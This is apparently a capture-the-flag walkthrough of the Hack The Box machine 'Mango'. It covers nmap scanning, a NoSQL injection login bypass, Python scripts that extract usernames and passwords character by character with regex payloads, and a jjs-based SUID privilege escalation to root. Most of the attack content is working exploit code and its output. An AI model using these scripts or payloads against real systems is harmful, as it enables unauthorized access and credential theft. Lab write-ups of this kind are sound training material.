Mango

Mango

Mango Is a medium difficulty Linux box that dives into the usage of NoSQL

Recon

we start off by scanning Mango's IP 10.10.10.162 with nmap

nmap -T4 -A -v 10.10.10.162

From our results we get the following

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: POST OPTIONS
|_http-title: Mango | Sweet & Juicy
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN

We see that port 80, 443 & 22 are open in adittion to this we see a ssl-cert being issued with the name staging-order.mango.htb We can now add

nano /etc/hosts
10.10.10.162 mango.htb staging-order.mango.htb

Navigating to mango.htb we find a search engine but not anything useful, moving onto staging-order.mango.htb however we find a login page

Let's fire up burp and intercept all the requests

We have tailtale hint of what the DB might be in the name MongoDB which itself is a NoSQL DB, lets see what we can gooogle up on it.

PayloadsAllTheThings/NoSQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

We can use a simple login in

username[$ne]=toto&password[$ne]=toto

We get back a status code 302 and with any other credentials 200 with this we can guess that a brute force attack

We can also use the regex to find the correct letters that are present in the username and pass, so lets write up a script for it.

from requests import post
from string import lowercase
url = 'http://staging-order.mango.htb/'
def sendPayload():
    for char in lowercase:
        regex = '{}.*'.format(char)
        data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' :'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            print "Found valid letter: {}".format(char)
def getUser():
    sendPayload()
if __name__ == '__main__':
    getUser()

python letters.py
Found valid letter: a
Found valid letter: d
Found valid letter: g
Found valid letter: i
Found valid letter: m
Found valid letter: n
Found valid letter: o

Right we have a base to start of with

from requests import post
from string import lowercase
url = 'http://staging-order.mango.htb/'
valid = ['a', 'd', 'g', 'i', 'm', 'n', 'o']
def sendPayload(word):
    regex = '^{}.*'.format(word)
    data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
    response = post(url, data = data, allow_redirects=False)
    if response.status_code == 302:
        return word
    else:
        return None
def getUser():
    for char in valid:
        if sendPayload(char) != None:
            print "Found username starting with {}".format(char)
if __name__ == '__main__':
    getUser()

python list.py
Found username starting with a
Found username starting with m

We now know there are 2 users with the usernames starting with either a or m

from requests import post
from string import lowercase
url = 'http://staging-order.mango.htb/'
valid = ['a', 'd', 'g', 'i', 'm', 'n', 'o']
def sendPayload(word):
    for char in valid:
        regex = '^{}.*'.format(word + char)
        data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            return char
    return None
def getUser():
    for ch in ['a', 'm']:
        username = ch
        while True:
            char = sendPayload(username)
        if char != None:
            username += char
        else:
            print "Username found: {}".format(username)
            break
if __name__ == '__main__':
    getUser()

python username.py
Username found: admin
Username found: mango

Now finally to get the passwords

from requests import post
from string import printable
url = 'http://staging-order.mango.htb/'
def sendPayload(user):
    valid = []
    for char in printable:
        regex = '{}.*'.format(char)
        data = { 'username' : user, 'password[$regex]' : regex, 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            valid.append(char)
    return valid
def getUser():

    for user in ['admin', 'mango']:
        valid = sendPayload(user)
        print "Valid characters for {}: {}".format(user, valid)
if __name__ == '__main__':
    getUser()

python passwords.py
Valid characters for admin:['0', '2', '3', '9', 'c', 't', 'B', 'K', 'S', '!', '#', '$',
'.', '>', '\\', '^', '|']
Valid characters for mango:['3', '5', '8', 'f', 'h', 'm', 'H', 'K', 'R', 'U', 'X', '$',
'.', '\\', ']', '^', '{', '|', '~']

from requests import post
from string import printable

url = 'http://staging-order.mango.htb/'
admin_pass = ['0', '2', '3', '9', 'c', 't', 'B', 'K', 'S', '!', '#', '\\$',
'\\.', '>', '\\\\', '\\^', '\\|']
mango_pass = ['3', '5', '8', 'f', 'h', 'm', 'H', 'K', 'R', 'U', 'X', '\\$',
'\\.', '\\\\', ']', '\\^', '{', '\\|', '~']

def sendPayload(user, word):
    valid = admin_pass if user == 'admin' else mango_pass
    for char in valid:
        regex = '^{}.*'.format(word + char)
        data = { 'username' : user, 'password[$regex]' : regex, 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            return char
    return None
def getUser():
    for user in ['admin', 'mango']:
        password = ''
        while True:
            char = sendPayload(user, password)
            if char != None:
                password += char
            else:
                print "Password for {} found: {}".format(user, password)
                break
if __name__ == '__main__':
    getUser()

And finally

python passwho.py
password for admin found:t9KcS3>!0B#2
password for mango found:h3mXK8RhU~f{]f5H

We can now ssh into the server with the passwords we gathered

ssh mango@mango.htb

Exploit

We see that there is another user besides mango

mango@mango:/home$ ls
admin  mango

Luckily we've already cracked admin so lets su into him

su - admin

And Voila! we are admin and with that we have user

Post Exploitation

Running Linpeas https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS we find that we have jjs running. Checking GTFOBins https://gtfobins.github.io/gtfobins/jjs/ we see that we can actually use it to priv esc

For this we'll be getting bin/bash and setting its SUID

echo "Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/bash /tmp/bash').waitFor()" | jjs
echo "Java.type('java.lang.Runtime').getRuntime().exec('chmod +s /tmp/bash').waitFor()" | jjs
/tmp/bash -p

bash-4.4# pwd
/home/admin
bash-4.4# cd /root/
bash-4.4# ls
root.txt

And we have root!

Useful Links

PayloadsAllTheThings/NoSQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Little Bobby Collections: How to write a MongoDB injectionMedium

PEASS-ng/linPEAS at master · carlospolop/PEASS-ngGitHub

jjs | GTFOBins